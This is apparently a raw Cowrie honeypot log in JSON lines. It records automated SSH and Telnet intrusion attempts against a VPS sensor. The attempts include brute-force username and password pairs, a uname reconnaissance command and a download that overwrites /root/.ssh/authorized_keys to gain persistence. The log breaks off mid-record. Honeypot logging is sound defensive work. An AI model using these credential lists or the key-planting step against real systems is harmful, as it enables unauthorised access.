{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T19:51:49.446373Z","src_ip":"199.195.248.191","session":"73d3459b33ea"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:51:49.447599Z","src_ip":"199.195.248.191","session":"73d3459b33ea"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:51:49.517695Z","src_ip":"217.154.1.158","session":"2dbfae65478c"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":56678,"dst_ip":"1.2.3.4","dst_port":22,"session":"1db3475efd63","protocol":"ssh","message":"New connection: 199.195.248.191:56678 (1.2.3.4:22) [session: 1db3475efd63]","sensor":"my-vps","timestamp":"2025-08-26T19:51:49.531371Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:51:49.543259Z","src_ip":"199.195.248.191","session":"1db3475efd63"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:51:49.629502Z","src_ip":"199.195.248.191","session":"1db3475efd63"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T19:51:49.986632Z","src_ip":"199.195.248.191","session":"1db3475efd63"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:51:51.093219Z","src_ip":"199.195.248.191","session":"1db3475efd63"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":57354,"dst_ip":"1.2.3.4","dst_port":22,"session":"61cefe5cb324","protocol":"ssh","message":"New connection: 199.195.248.191:57354 (1.2.3.4:22) [session: 61cefe5cb324]","sensor":"my-vps","timestamp":"2025-08-26T19:51:51.179516Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:51:51.180571Z","src_ip":"199.195.248.191","session":"61cefe5cb324"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:51:51.270009Z","src_ip":"199.195.248.191","session":"61cefe5cb324"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:51:51.635905Z","src_ip":"199.195.248.191","session":"61cefe5cb324"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:51:51.726299Z","src_ip":"199.195.248.191","session":"61cefe5cb324"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:51:51.727475Z","src_ip":"199.195.248.191","session":"73d3459b33ea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45322,"dst_ip":"1.2.3.4","dst_port":23,"session":"0077b54f1862","protocol":"telnet","message":"New connection: 212.227.125.160:45322 (1.2.3.4:23) [session: 0077b54f1862]","sensor":"my-vps","timestamp":"2025-08-26T19:51:53.314942Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:51:53.400467Z","src_ip":"212.227.125.160","session":"0077b54f1862"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:51:53.486266Z","src_ip":"212.227.125.160","session":"0077b54f1862"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44128,"dst_ip":"1.2.3.4","dst_port":22,"session":"554650368bd6","protocol":"ssh","message":"New connection: 212.227.235.229:44128 (1.2.3.4:22) [session: 554650368bd6]","sensor":"my-vps","timestamp":"2025-08-26T19:52:01.213782Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:52:01.785074Z","src_ip":"212.227.235.229","session":"554650368bd6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:52:01.785968Z","src_ip":"212.227.235.229","session":"554650368bd6"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":43896,"dst_ip":"1.2.3.4","dst_port":22,"session":"5fbc970beff4","protocol":"ssh","message":"New connection: 217.154.1.158:43896 (1.2.3.4:22) [session: 5fbc970beff4]","sensor":"my-vps","timestamp":"2025-08-26T19:52:05.925762Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:52:05.926839Z","src_ip":"217.154.1.158","session":"5fbc970beff4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:52:05.941285Z","src_ip":"217.154.1.158","session":"5fbc970beff4"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"postgres","message":"login attempt [postgres/postgres] failed","sensor":"my-vps","timestamp":"2025-08-26T19:52:05.987145Z","src_ip":"217.154.1.158","session":"5fbc970beff4"}
{"eventid":"cowrie.login.success","username":"root","password":"Nishit@123","message":"login attempt [root/Nishit@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:52:06.376281Z","src_ip":"212.227.235.229","session":"554650368bd6"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:52:07.004497Z","src_ip":"217.154.1.158","session":"5fbc970beff4"}
{"eventid":"cowrie.session.closed","duration":"6.1","message":"Connection lost after 6.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:52:07.299777Z","src_ip":"212.227.235.229","session":"554650368bd6"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":45520,"dst_ip":"1.2.3.4","dst_port":22,"session":"0ef4293e6d84","protocol":"ssh","message":"New connection: 217.154.1.158:45520 (1.2.3.4:22) [session: 0ef4293e6d84]","sensor":"my-vps","timestamp":"2025-08-26T19:52:23.457251Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:52:23.458209Z","src_ip":"217.154.1.158","session":"0ef4293e6d84"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:52:23.472622Z","src_ip":"217.154.1.158","session":"0ef4293e6d84"}
{"eventid":"cowrie.login.failed","username":"jenkins","password":"jenkins","message":"login attempt [jenkins/jenkins] failed","sensor":"my-vps","timestamp":"2025-08-26T19:52:23.516684Z","src_ip":"217.154.1.158","session":"0ef4293e6d84"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:52:24.534381Z","src_ip":"217.154.1.158","session":"0ef4293e6d84"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":57618,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b60564dd852","protocol":"ssh","message":"New connection: 217.72.205.35:57618 (1.2.3.4:22) [session: 9b60564dd852]","sensor":"my-vps","timestamp":"2025-08-26T19:52:34.338579Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:52:34.339867Z","src_ip":"217.72.205.35","session":"9b60564dd852"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":54066,"dst_ip":"1.2.3.4","dst_port":22,"session":"bdc2165a3949","protocol":"ssh","message":"New connection: 217.154.1.158:54066 (1.2.3.4:22) [session: bdc2165a3949]","sensor":"my-vps","timestamp":"2025-08-26T19:52:40.839125Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:52:40.839824Z","src_ip":"217.154.1.158","session":"bdc2165a3949"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:52:40.855867Z","src_ip":"217.154.1.158","session":"bdc2165a3949"}
{"eventid":"cowrie.login.success","username":"root","password":"root123","message":"login attempt [root/root123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:52:40.900630Z","src_ip":"217.154.1.158","session":"bdc2165a3949"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:52:40.954452Z","src_ip":"217.154.1.158","session":"bdc2165a3949"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T19:52:40.955456Z","src_ip":"217.154.1.158","session":"bdc2165a3949"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:52:40.971527Z","src_ip":"217.154.1.158","session":"bdc2165a3949"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:52:40.972846Z","src_ip":"217.154.1.158","session":"bdc2165a3949"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":54726,"dst_ip":"1.2.3.4","dst_port":22,"session":"ad04fd05788c","protocol":"ssh","message":"New connection: 199.195.248.191:54726 (1.2.3.4:22) [session: ad04fd05788c]","sensor":"my-vps","timestamp":"2025-08-26T19:52:55.396187Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:52:55.401545Z","src_ip":"199.195.248.191","session":"ad04fd05788c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:52:55.495950Z","src_ip":"199.195.248.191","session":"ad04fd05788c"}
{"eventid":"cowrie.login.failed","username":"wangzhiyong","password":"123456","message":"login attempt [wangzhiyong/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T19:52:55.850620Z","src_ip":"199.195.248.191","session":"ad04fd05788c"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:52:56.945386Z","src_ip":"199.195.248.191","session":"ad04fd05788c"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":60236,"dst_ip":"1.2.3.4","dst_port":22,"session":"de5359771e53","protocol":"ssh","message":"New connection: 217.154.1.158:60236 (1.2.3.4:22) [session: de5359771e53]","sensor":"my-vps","timestamp":"2025-08-26T19:52:58.314910Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:52:58.316308Z","src_ip":"217.154.1.158","session":"de5359771e53"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:52:58.333058Z","src_ip":"217.154.1.158","session":"de5359771e53"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin123","message":"login attempt [admin/admin123] failed","sensor":"my-vps","timestamp":"2025-08-26T19:52:58.378965Z","src_ip":"217.154.1.158","session":"de5359771e53"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:52:59.395041Z","src_ip":"217.154.1.158","session":"de5359771e53"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":59230,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c0769ee3c3f","protocol":"ssh","message":"New connection: 217.154.1.158:59230 (1.2.3.4:22) [session: 9c0769ee3c3f]","sensor":"my-vps","timestamp":"2025-08-26T19:53:15.933650Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:53:15.934720Z","src_ip":"217.154.1.158","session":"9c0769ee3c3f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 